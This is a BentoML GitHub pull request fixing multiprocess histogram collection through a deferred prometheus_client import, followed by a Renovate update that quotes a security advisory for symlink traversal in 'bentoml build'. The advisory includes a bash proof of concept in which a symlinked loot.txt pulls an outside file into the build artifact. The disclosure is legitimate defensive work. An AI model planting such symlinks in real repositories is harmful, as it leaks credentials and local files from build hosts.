fix: defer prometheus_client import in bentoml.metrics to fix histogram collection in multiprocess mode #5602

Merged
frostming merged 2 commits into bentoml:main from ramkrishs:fix/metrics-multiprocess-histogram-collection on Apr 30, 2026

@ramkrishs
Contributor

What does this PR address?

Fixes #5056 — when multiple Histogram objects are declared using bentoml.metrics, only the last one appears in the /metrics endpoint output.

Root cause

bentoml.metrics previously ran sys.modules[__name__] = prometheus_client at import time. This meant prometheus_client was imported the moment user service code wrote from bentoml.metrics import Histogram — which happens at service-module load time in the parent process, before any worker is forked.

Workers set PROMETHEUS_MULTIPROC_DIR in os.environ during startup. But since prometheus_client was already imported without this env var, it had initialised in single-process mode. Any Histogram or Counter objects created afterwards wrote to the in-process registry, not the file-backed multiprocess one. MultiProcessCollector — which BentoML's /metrics endpoint uses — reads from those files and therefore saw none of the user-defined metrics.
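
To illustrate why import order matters here, the following minimal sketch uses a hypothetical stand-in module (`fake_metrics_lib`, which is not part of prometheus_client or BentoML) that decides its mode once, when its top-level code runs. It only models the import-time decision described above; the names `FAKE_LIB_SOURCE`, `import_fake_lib`, and the `/tmp/prom` path are assumptions made for the example.

```python
import os
import types

# Hypothetical stand-in for a library that picks its storage mode once,
# at import time, based on an environment variable.
FAKE_LIB_SOURCE = '''
import os
MODE = "multiprocess" if "PROMETHEUS_MULTIPROC_DIR" in os.environ else "single-process"
'''


def import_fake_lib() -> types.ModuleType:
    """Run FAKE_LIB_SOURCE as a fresh module, mimicking a first import."""
    module = types.ModuleType("fake_metrics_lib")
    exec(FAKE_LIB_SOURCE, module.__dict__)
    return module


os.environ.pop("PROMETHEUS_MULTIPROC_DIR", None)
early = import_fake_lib()  # imported before the env var exists (parent process)

os.environ["PROMETHEUS_MULTIPROC_DIR"] = "/tmp/prom"  # set later, at worker startup
late = import_fake_lib()   # imported only after the env var exists

print(early.MODE)  # single-process: setting the variable afterwards changes nothing
print(late.MODE)   # multiprocess

os.environ.pop("PROMETHEUS_MULTIPROC_DIR", None)  # leave the environment clean
```

The module loaded early keeps its single-process mode even though the variable is set afterwards, which is the ordering problem the deferred import is meant to avoid.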

The "only last histogram collected" symptom was incidental: the collection path happened to surface one metric through a separate mechanism, masking the true scope of data loss.

Fix

Replace the eager sys.modules shim with a __getattr__ lazy loader in src/bentoml/metrics.py.

prometheus_client is now imported the first time an attribute is accessed (e.g. bentoml.metrics.Histogram), which happens after the worker has already set PROMETHEUS_MULTIPROC_DIR. The resolved attribute is cached in the module globals, so subsequent accesses resolve through normal module lookup and never reach __getattr__.

# Before (broken): prometheus_client imported at bentoml.metrics import time
import sys
import prometheus_client
sys.modules[__name__] = prometheus_client

# After (fixed): prometheus_client imported on first attribute access
def __getattr__(name: str) -> object:
    # Deferred import: runs after PROMETHEUS_MULTIPROC_DIR is set
    import prometheus_client
    attr = getattr(prometheus_client, name)
    globals()[name] = attr  # cache so later lookups bypass __getattr__
    return attr

Tests

Two new unit tests in tests/unit/test_metrics_deferred_import.py:

  • test_bentoml_metrics_does_not_import_prometheus_client_eagerly — asserts that import bentoml.metrics does not pull in prometheus_client.
  • test_multiple_histograms_all_collected_in_multiprocess_mode — full regression: creates three Histogram objects after setting PROMETHEUS_MULTIPROC_DIR, then verifies all three are visible to MultiProcessCollector. This is the exact scenario from the issue report.
PASSED tests/unit/test_metrics_deferred_import.py::test_bentoml_metrics_does_not_import_prometheus_client_eagerly
PASSED tests/unit/test_metrics_deferred_import.py::test_multiple_histograms_all_collected_in_multiprocess_mode
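
One way to check an "is not imported eagerly" property is to import the module in a fresh interpreter and inspect `sys.modules`, so that modules already loaded by the test runner cannot mask the result. The helper below is a generic sketch under that assumption; `imports_eagerly` is a hypothetical name, not the helper used in the PR's test file, and it is exercised against standard-library modules only.

```python
import subprocess
import sys


def imports_eagerly(module: str, dependency: str) -> bool:
    """Return True if importing `module` in a fresh interpreter loads `dependency`."""
    code = (
        "import importlib, sys\n"
        f"importlib.import_module({module!r})\n"
        f"print({dependency!r} in sys.modules)\n"
    )
    result = subprocess.run(
        [sys.executable, "-c", code],
        capture_output=True,
        text=True,
        check=True,  # fail loudly if the import itself raises
    )
    # Use the last line in case the imported module prints something itself.
    return result.stdout.strip().splitlines()[-1] == "True"


json_loads_decoder = imports_eagerly("json", "json.decoder")
json_loads_sqlite = imports_eagerly("json", "sqlite3")
```

Applied to this PR, the analogous check would be `imports_eagerly("bentoml.metrics", "prometheus_client")`, which the first test expects to be false after the fix.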

Notes

  • The DeprecationWarning from bentoml.metrics is preserved — it fires on first attribute access, which is the first point where user code actually interacts with the module.
  • Backward compatibility is maintained: all prometheus_client symbols are still accessible through bentoml.metrics.
  • This is a pure Python change with no dependency additions.

…am collection in multiprocess mode

Fixes bentoml#5056.

## Root cause

`bentoml.metrics` previously executed `sys.modules[__name__] = prometheus_client`
at import time, which caused `prometheus_client` to be imported immediately when
user service code did `from bentoml.metrics import Histogram`.

BentoML loads the service module in the parent process *before* forking workers.
Workers set `PROMETHEUS_MULTIPROC_DIR` in `os.environ` during startup, but by
that point `prometheus_client` had already been imported without the env var and
had initialised in single-process mode.  Any `Histogram` or `Counter` objects
created afterwards wrote to the in-process registry, not the file-backed
multiprocess one, so `MultiProcessCollector` (used by BentoML's `/metrics`
endpoint) saw nothing from them.

When multiple `Histogram` objects were declared, the symptom manifested as
"only the last declared histogram is collected" because the collection code
happened to pick up one metric through a different path, masking the full scope
of the data loss.

## Fix

Replace the eager `sys.modules` shim with a `__getattr__` lazy loader.
`prometheus_client` is now imported the first time an attribute (e.g.
`Histogram`) is accessed, which happens *after* the worker has already set
`PROMETHEUS_MULTIPROC_DIR`.  The resolved attribute is then cached in the
module globals so subsequent accesses skip `__getattr__` entirely.

## Tests

Two new unit tests in `tests/unit/test_metrics_deferred_import.py`:
- `test_bentoml_metrics_does_not_import_prometheus_client_eagerly`: asserts
  that importing `bentoml.metrics` does not pull in `prometheus_client`.
- `test_multiple_histograms_all_collected_in_multiprocess_mode`: full
  regression test confirming all three histograms from the issue report are
  visible to `MultiProcessCollector` after the worker sets the env var.
@ramkrishs requested a review from a team as a code owner on April 28, 2026 22:21
@ramkrishs requested review from xianml and removed request for a team on April 28, 2026 22:21
@frostming merged commit 32230a5 into bentoml:main on Apr 30, 2026
91 of 96 checks passed
renovate Bot added a commit to yxtay/agentic-recommenders that referenced this pull request May 7, 2026
This PR contains the following updates:

| Package | Type | Update | Change | OpenSSF |
|---|---|---|---|---|
| [bentoml](https://redirect.github.com/bentoml/bentoml) | project.dependencies | patch | `1.4.38` → `1.4.39` | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/bentoml/bentoml/badge)](https://securityscorecards.dev/viewer/?uri=github.com/bentoml/bentoml) |

---

> [!WARNING]
> Some dependencies could not be looked up. Check the [Dependency
Dashboard](../issues/12) for more information.

---

### BentoML has Information Disclosure in `bentoml build` via symlink traversal in the build context
[CVE-2026-40610](https://nvd.nist.gov/vuln/detail/CVE-2026-40610) / [GHSA-mcfx-4vc6-qgxv](https://redirect.github.com/advisories/GHSA-mcfx-4vc6-qgxv)

<details>
<summary>More information</summary>

#### Details
##### Summary
BentoML's `bentoml build` packaging workflow follows attacker-controlled
symlinks inside the build context and copies the referenced file
contents into the generated Bento artifact.

If a victim builds an untrusted repository or other attacker-supplied
build context, the attacker can place a symlink such as `loot.txt ->
/tmp/outside-marker.txt` or a link to a more sensitive local file. When
`bentoml build` runs, BentoML dereferences the symlink and packages the
target file contents into the Bento. The leaked file can then propagate
further through export, push, or containerization workflows.

##### Details
The vulnerable code walks files under the build context and copies each
matched entry into the Bento source directory:

```python
for root, _, files in os.walk(ctx_path):
    for f in files:
        dir_path = os.path.relpath(root, ctx_path)
        path = os.path.join(dir_path, f).replace(os.sep, "/")
        if specs.includes(path):
            src_file = ctx_path.joinpath(path)
            dst_file = target_fs.joinpath(dest_path)
            shutil.copy(src_file, dst_file)
```

There is no validation that the resolved path of `src_file` remains
inside `ctx_path` before `shutil.copy` dereferences the source path. As
a result, a repository-controlled symlink can cross the trust boundary
from `attacker-controlled repository content` to `developer/CI host
filesystem` during the build process.

This is a build-time path traversal / symlink traversal issue in the
packaging feature, not a runtime API issue. The resulting Bento may
later be exported, pushed to remote storage, or converted into a
container image, which amplifies the leakage impact.
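
The missing validation described above can be sketched as a containment check on the resolved path. This is an illustrative example only and not necessarily how the fix shipped in v1.4.39 works; the helper name `resolves_inside` and the file layout are assumptions, and the script needs a platform where unprivileged symlink creation is allowed.

```python
import os
import tempfile
from pathlib import Path


def resolves_inside(ctx_path: Path, candidate: Path) -> bool:
    """Return True if `candidate`, with symlinks resolved, stays under `ctx_path`."""
    root = ctx_path.resolve()
    target = candidate.resolve()
    return target == root or root in target.parents


with tempfile.TemporaryDirectory() as tmp:
    ctx = Path(tmp, "build-context")
    ctx.mkdir()

    # A file outside the build context, standing in for a sensitive local file.
    outside = Path(tmp, "outside-marker.txt")
    outside.write_text("marker\n")

    # A regular file and a symlink that escapes the build context.
    (ctx / "service.py").write_text("# service code\n")
    os.symlink(outside, ctx / "loot.txt")

    regular_ok = resolves_inside(ctx, ctx / "service.py")
    symlink_ok = resolves_inside(ctx, ctx / "loot.txt")

print(regular_ok)  # True
print(symlink_ok)  # False: the link resolves outside the build context
```

A packaging loop could skip or reject any entry for which such a check returns false before copying it.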

##### PoC
The issue was verified in WSL against BentoML 1.4.38. The following
script reproduces the vulnerability by using a harmless marker file
outside the build directory.

```bash
mkdir -p /tmp/bento-symlink-poc
cd /tmp/bento-symlink-poc

printf 'BENTOML_SYMLINK_POC_123456\n' > /tmp/outside-marker.txt

cat > service.py <<'EOF'
import bentoml

@bentoml.service
class Demo:
    @bentoml.api
    def ping(self, x: str) -> str:
        return x
EOF

cat > bentofile.yaml <<'EOF'
service: "service:Demo"
include:
  - "service.py"
  - "loot.txt"
EOF

ln -s /tmp/outside-marker.txt loot.txt

bentoml build --output tag
bentoml export demo:7pilrpjtlomelwct /tmp/poc.zip

mkdir -p /tmp/poc-unzip
unzip -o /tmp/poc.zip -d /tmp/poc-unzip
find /tmp/poc-unzip -name loot.txt -print
cat /tmp/poc-unzip/**/src/loot.txt 2>/dev/null || \
find /tmp/poc-unzip -path '*/src/loot.txt' -exec cat {} \;
```

- The script creates `/tmp/outside-marker.txt` outside the build context
as a stand-in for a sensitive local file.
- It creates a minimal BentoML service and explicitly includes
`loot.txt` in `bentofile.yaml`.
- It creates `loot.txt` as a symlink to the external marker file.
<img width="1531" height="648" alt="image"
src="https://github.com/user-attachments/assets/1312dcf0-74b0-4fb6-a05d-b68644470d82"
/>

- It runs `bentoml build`, exports the generated Bento, unzips it, and
reads the packaged `src/loot.txt`.
- Successful exploitation is confirmed when the packaged file contains
`BENTOML_SYMLINK_POC_123456`, proving that BentoML copied the external
file contents rather than keeping only the symlink.
<img width="1315" height="121" alt="image"
src="https://github.com/user-attachments/assets/6ed34f51-9b68-4fa9-8a42-011deb84d54e"
/>

<img width="1697" height="760" alt="image"
src="https://github.com/user-attachments/assets/9b8a8ae5-4f06-46b4-9e4a-dee25cc5d203"
/>

##### Impact
An attacker who can cause a developer, release engineer, or CI system to
run `bentoml build` on an attacker-controlled repository can exfiltrate
local files from the build host into the Bento artifact.

This can expose secrets such as cloud credentials, SSH keys, API tokens,
environment files, or other sensitive local configuration. Because Bento
artifacts are commonly exported, uploaded, stored, or containerized
after build, the leaked file contents can spread beyond the original
build machine.

#### Severity
- CVSS Score: 5.5 / 10 (Medium)
- Vector String: `CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N`

#### References
- [https://github.com/bentoml/BentoML/security/advisories/GHSA-mcfx-4vc6-qgxv](https://redirect.github.com/bentoml/BentoML/security/advisories/GHSA-mcfx-4vc6-qgxv)
- [https://github.com/advisories/GHSA-mcfx-4vc6-qgxv](https://redirect.github.com/advisories/GHSA-mcfx-4vc6-qgxv)

This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-mcfx-4vc6-qgxv) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>bentoml/bentoml (bentoml)</summary>

### [`v1.4.39`](https://redirect.github.com/bentoml/BentoML/releases/tag/v1.4.39)

[Compare Source](https://redirect.github.com/bentoml/bentoml/compare/v1.4.38...v1.4.39)

##### What's Changed

- ci: pre-commit autoupdate \[skip ci] by [@pre-commit-ci](https://redirect.github.com/pre-commit-ci)\[bot] in [bentoml/BentoML#5593](https://redirect.github.com/bentoml/BentoML/pull/5593)
- fix: prevent following symlinks when copying files in BentoStore by [@frostming](https://redirect.github.com/frostming) in [bentoml/BentoML#5598](https://redirect.github.com/bentoml/BentoML/pull/5598)
- fix: add sharing=locked to BuildKit cache mounts for multi-arch builds by [@lawrence3699](https://redirect.github.com/lawrence3699) in [bentoml/BentoML#5597](https://redirect.github.com/bentoml/BentoML/pull/5597)
- fix: enhance Dockerfile generation by normalizing base image lines and adding tests by [@frostming](https://redirect.github.com/frostming) in [bentoml/BentoML#5603](https://redirect.github.com/bentoml/BentoML/pull/5603)
- fix: defer prometheus\_client import in bentoml.metrics to fix histogram collection in multiprocess mode by [@ramkrishs](https://redirect.github.com/ramkrishs) in [bentoml/BentoML#5602](https://redirect.github.com/bentoml/BentoML/pull/5602)
- ci: pre-commit autoupdate \[skip ci] by [@pre-commit-ci](https://redirect.github.com/pre-commit-ci)\[bot] in [bentoml/BentoML#5605](https://redirect.github.com/bentoml/BentoML/pull/5605)
- fix: handle string input in FileSchema by encoding to UTF-8 by [@frostming](https://redirect.github.com/frostming) in [bentoml/BentoML#5606](https://redirect.github.com/bentoml/BentoML/pull/5606)

##### New Contributors

- [@lawrence3699](https://redirect.github.com/lawrence3699) made their first contribution in [bentoml/BentoML#5597](https://redirect.github.com/bentoml/BentoML/pull/5597)
- [@ramkrishs](https://redirect.github.com/ramkrishs) made their first contribution in [bentoml/BentoML#5602](https://redirect.github.com/bentoml/BentoML/pull/5602)

**Full Changelog**: <bentoml/BentoML@v1.4.38...v1.4.39>

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - ""
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Enabled.

♻ **Rebasing**: Whenever PR is behind base branch, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/yxtay/agentic-recommenders).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>

Development

Successfully merging this pull request may close these issues.

bug: Only the Last Declared Histogram is Collected When Using Multiple Histograms
